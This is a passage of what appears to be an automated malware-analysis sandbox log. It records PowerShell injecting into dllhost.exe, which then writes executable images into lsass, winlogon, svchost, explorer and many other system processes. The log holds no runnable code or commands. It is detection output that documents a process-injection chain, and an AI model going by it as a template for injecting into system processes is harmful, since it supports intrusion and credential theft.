                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: A00000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2500000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2AE0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 1010000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2DF0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2480000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 1100000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: A00000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2CD0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 22C0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2A60000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 1260000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 9C0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 850000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: ED0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 1360000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 6C0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2BB0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 890000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 1210000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2630000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2550000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 9E0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2400000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 20E0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 1020000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 14E0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 1140000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: BB0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 13D0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Users\user\AppData\Local\Temp\$778e373e base: F70000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe base: 7460000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1F675170000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Users\user\AppData\Local\Temp\$77eec42d base: E50000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: PID: 1028 base: 3200000 value: 4DJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 4304Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140001000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140004000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140006000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140007000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 41993B0010Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 1E858950000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 140ADFC0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 195DD590000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 1160CA30000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 257E1070000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F28C1D0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CA97FD0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2652E0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 254A27C0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24B87DA0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 205FB3C0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A205670000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18EC1F30000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 25CE3BC0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26238950000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2786E560000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1611FF70000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 27C0F350000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B279570000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E70A460000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22D13110000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22C8C580000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2825F1D0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AA5D9C0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 20BAEC90000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2DC1B0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1C782530000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: A60000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24066EB0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A3FD9A0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 181CEDB0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A142790000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 195B6F30000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DCC0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1B973730000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1DBF9DA0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D76CCC0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A239D90000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17CFA390000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23FB7270000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1DF53B50000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 164E88A0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 25177B50000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 28D5D340000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 24EB5E10000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 20859990000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F153C20000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D241D40000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 16FADAD0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 20E03070000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15204DB0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 3200000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 175C5280000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 1CE76AA0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22EF1B30000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1C7F34B0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 261DE4D0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 22E74470000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 1B1A9D00000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 217AF8A0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 226D8930000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 13E5E930000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F843DC0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 21197E30000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 223DC870000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 1B4698D0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 28AF9060000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 27234C50000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 28543540000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\audiodg.exe base: 2B684340000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1BE58920000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 21039380000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\cscript.exe base: 930000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 114A6AD0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 250E2CD0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 34C0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 1DCBB740000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 1190000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 6D0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 1570000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2CF0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2A40000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 3000000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 1060000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 1590000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: C20000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 8C0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2E00000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 9B0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 7B0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2870000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 6E0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 8F0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2290000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 28B0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2640000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 1570000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2AD0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 650000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2A00000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 9D0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2B20000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2870000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 12C0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2DA0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 6B0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2C40000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 24C0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2A50000Jump to behavior
